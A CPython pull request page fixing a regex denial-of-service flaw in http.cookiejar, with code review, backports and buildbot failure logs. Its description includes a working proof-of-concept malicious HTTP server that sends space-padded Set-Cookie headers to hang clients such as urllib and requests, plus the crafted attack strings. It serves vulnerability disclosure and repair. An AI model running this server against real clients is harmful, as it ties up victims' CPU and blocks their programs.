
bpo-38804: Fix REDoS in http.cookiejar #17157

Merged
merged 6 commits on Nov 22, 2019

Conversation

bcaller
Contributor

@bcaller bcaller commented Nov 14, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and block execution for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups, the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
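To make the ambiguity concrete, here is a minimal sketch using reduced stand-in patterns (not the actual LOOSE_HTTP_DATE_RE): with three adjacent \s* groups the engine must try every way of splitting the run of spaces between them before the trailing "!" forces failure, whereas a single \s* fails in one pass.

```python
import re

# Reduced stand-ins for illustration -- not the real stdlib patterns.
ambiguous = re.compile(r"\d+-\w+-\d+(\s*)(\s*)(\s*)$")  # O(n**3) on failure
unambiguous = re.compile(r"\d+-\w+-\d+(\s*)$")          # O(n) on failure

attack = "1-c-1" + " " * 150 + "!"

# Both reject the input, but only the ambiguous pattern backtracks
# through every split of the 150 spaces among its three groups.
print(ambiguous.match(attack))    # None (after roughly 150**3/6 backtracking steps)
print(unambiguous.match(attack))  # None (immediately)
```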

You can create a malicious server that responds with Set-Cookie headers
to attack all Python programs that access it, e.g.:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
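The attack can also be reproduced without a server via the http2time helper in http.cookiejar, which is what applies LOOSE_HTTP_DATE_RE to the Expires value (a minimal sketch; on a patched interpreter both calls return immediately):

```python
from http.cookiejar import http2time

# Malicious Expires value: a loose date prefix, a long run of spaces,
# and a trailing "!" that forces the anchored regex to fail.
# On an unpatched interpreter this call effectively never returns.
malicious = "1-c-1" + " " * 2000 + "!"
print(http2time(malicious))  # None: not a valid date

# A well-formed loose date still parses to an epoch timestamp.
print(http2time("22-Feb-2020 12:00:00 GMT") is not None)  # True
```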

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html:

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

https://bugs.python.org/issue38804

@the-knights-who-say-ni

Hello, and thanks for your contribution!

I'm a bot set up to make sure that the project can legally accept this contribution by verifying everyone involved has signed the PSF contributor agreement (CLA).

CLA Missing

Our records indicate the following people have not signed the CLA:

@bcaller

For legal reasons we need all the people listed to sign the CLA before we can look at your contribution. Please follow the steps outlined in the CPython devguide to rectify this issue.

If you have recently signed the CLA, please wait at least one business day
before our records are updated.

You can check yourself to see if the CLA has been received.

Thanks again for the contribution, we look forward to reviewing it!

@brandtbucher
Member

Thanks for your time @bcaller, and welcome to CPython!

I assume that you've seen the bot's message about the CLA?

@brandtbucher brandtbucher added the type-security A security issue label Nov 15, 2019
@bcaller
Contributor Author

bcaller commented Nov 15, 2019

Yes @brandtbucher, I just signed it.

Member

@brandtbucher brandtbucher left a comment


This PR should also have a NEWS entry. Something like:

Fixes a ReDoS vulnerability in :class:`http.cookiejar.CookieJar`.

Member

@brandtbucher brandtbucher left a comment


Thanks @bcaller, this looks good to me now. I’m not an expert on this code though, so we’ll need to find somebody who is.

Member

@serhiy-storchaka serhiy-storchaka left a comment


LGTM. There is the same problem with ISO_DATE_RE. Do you mind fixing it too?

It would be nice to add tests (if possible) -- some examples which take more than an hour with unpatched code and just a fraction of a second with patched code.

@bcaller
Contributor Author

bcaller commented Nov 15, 2019

ISO_DATE_RE only has two overlapping \s* groups (compared to three), so it isn't catastrophic.
Also, it is only used when loading LWPCookieJar files, so merely processing an HTTP response won't cause DoS.
That said, it is a little inefficient when an LWPCookieJar file has been tampered with, so it could be fixed in the same way.

I was thinking about the test, but how do I make a test that is reliable regardless of CPU power and other processes running on the machine? I could make a test that measures the time for successively longer strings and asserts that the performance is sub-quadratic?
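One way to make such a test less sensitive to machine speed (a sketch, using a hypothetical stand-in pattern rather than the real stdlib regexes) is to time the match at two input sizes and estimate the growth exponent; constant factors cancel out in the ratio:

```python
import math
import re
import time

# Hypothetical stand-in with the same overlapping-\s* shape as the
# vulnerable regexes -- not the actual stdlib pattern.
CUBIC = re.compile(r"\d+-\w+-\d+(\s*)(\s*)(\s*)$")

def match_time(n_spaces):
    text = "1-c-1" + " " * n_spaces + "!"
    start = time.perf_counter()
    CUBIC.match(text)  # fails, backtracking through the spaces
    return time.perf_counter() - start

t_small = match_time(100)
t_large = match_time(200)
# Doubling the input multiplies runtime by roughly 2**exponent;
# cubic backtracking gives an exponent near 3, linear near 1.
exponent = math.log(t_large / max(t_small, 1e-9), 2)
```

A regression test could then assert that the exponent stays well below the cubic regime, rather than comparing against a hardcoded wall-clock limit.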

@serhiy-storchaka
Member

I think it is enough to use an example that takes a long time (an hour or a few hours). It will not pass unnoticed.

@bcaller
Contributor Author

bcaller commented Nov 15, 2019

I wrote an overcomplicated test

    def test_http2time_redos_regression(self):
        def run_timer(n_spaces):
            return timeit.timeit(
                stmt="http2time(expires)",
                number=5,
                globals=dict(
                    http2time=http2time,
                    expires="1-c-1{}!".format(' ' * n_spaces),
                ),
            )
        base_n_spaces = 500
        factor = 2  # Length of backtracking sequence is increased by this factor
        long_time = run_timer(base_n_spaces * factor)
        short_time = run_timer(base_n_spaces)
        self.assertLess(
            long_time / short_time,  # Execution time increased by this factor
            factor ** 1.2,  # Expected to be approximately equal, but we can have some leeway
            "Performance of http2time is significantly worse than linear",
        )

but I think I'll just do what you said instead.

    def test_http2time_redos_regression_actually_completes(self):
        # LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused
        # catastrophic backtracking (REDoS). If we regress, this test will
        # take a very long time to succeed.
        http2time("1-c-1{}!".format(" " * 65506))
Member


Would it be possible to use time.perf_counter() to detect if the function takes way too long? For example, test with 1 space, then test with 65K spaces, and check that the second test is not, say, 1000x slower?

In general, I dislike tests which rely on time, since they are likely to fail on our slowest buildbots. But I'm not suggesting hardcoded timings, only comparing the timings of two function calls. It may work on the buildbots, especially if the threshold is large enough (1000x slower? More?).

cc @pablogsal

Member


With the fixed regex, the test should take a fraction of a second.

Contributor Author


@vstinner Do you mean something like the above #17157 (comment)?
The issue here is whether we really should have a unit test for the algorithmic complexity of a function at all, and what it should look like. Do we do that anywhere else?
I agree that having a one-line test which never explicitly fails is a bit weird.

Member

@serhiy-storchaka serhiy-storchaka left a comment


http2time() has cubic complexity, iso2time() has quadratic complexity.


If we regress, this test will take a very long time.

A string like

    "444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
Member

@serhiy-storchaka serhiy-storchaka left a comment


Great! I see this is your first contribution. Would you mind also adding your name to Misc/ACKS?

@miss-islington
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.8.
🐍🍒⛏🤖

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
@bedevere-bot bedevere-bot removed the needs backport to 3.8 only security fixes label Nov 22, 2019
@bedevere-bot

GH-17341 is a backport of this pull request to the 3.8 branch.

@miss-islington
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.7.
🐍🍒⛏🤖

@bedevere-bot

GH-17342 is a backport of this pull request to the 3.7 branch.

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
@miss-islington
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.6.
🐍🍒⛏🤖 I'm not a witch! I'm not a witch!

@bedevere-bot

GH-17343 is a backport of this pull request to the 3.6 branch.

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
@vstinner
Member

What happens now?

I merged your PR, thanks. I'm okay with skipping an automated test that measures the maximum time.

I backported the fix to all supported Python branches: 2.7, 3.5, 3.6, 3.7 and 3.8.

@brandtbucher
Member

Congrats on your first CPython contribution @bcaller! 🍾

Looking forward to seeing more from you in the future.

miss-islington added a commit that referenced this pull request Nov 22, 2019
miss-islington added a commit that referenced this pull request Nov 22, 2019
ned-deily pushed a commit that referenced this pull request Nov 22, 2019
vstinner added a commit that referenced this pull request Nov 24, 2019
@bedevere-bot

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/8) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/8

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 198.9s
  • test_io: 195.0s
  • test_tokenize: 144.3s
  • test_regrtest: 139.3s
  • test_decimal: 129.4s
  • test_itertools: 110.4s
  • test_multiprocessing: 77.4s
  • test_subprocess: 76.2s
  • test_file2k: 45.5s
  • test_weakref: 43.2s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
expected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 11 min 47 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
error: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 35632)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
ok


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
ok

@bedevere-bot

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/9) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/9

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 258.7s
  • test_io: 234.9s
  • test_tokenize: 181.0s
  • test_regrtest: 167.1s
  • test_decimal: 142.4s
  • test_itertools: 134.2s
  • test_subprocess: 115.7s
  • test_weakref: 63.0s
  • test_asyncore: 52.0s
  • test_multibytecodec: 46.3s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
expected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 14 min 13 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
error: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 58881)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
ok


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
ok

jacobneiltaylor pushed a commit to jacobneiltaylor/cpython that referenced this pull request Dec 5, 2019
shihai1991 pushed a commit to shihai1991/cpython that referenced this pull request Jan 31, 2020
larryhastings pushed a commit that referenced this pull request Apr 3, 2020
wshanks added a commit to wshanks/python-future that referenced this pull request Dec 23, 2022
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS). The regex contained multiple
overlapping \s* capture groups. A long sequence of spaces can trigger
bad performance.

See python/cpython#17157 and https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/
Labels
type-security A security issue
7 participants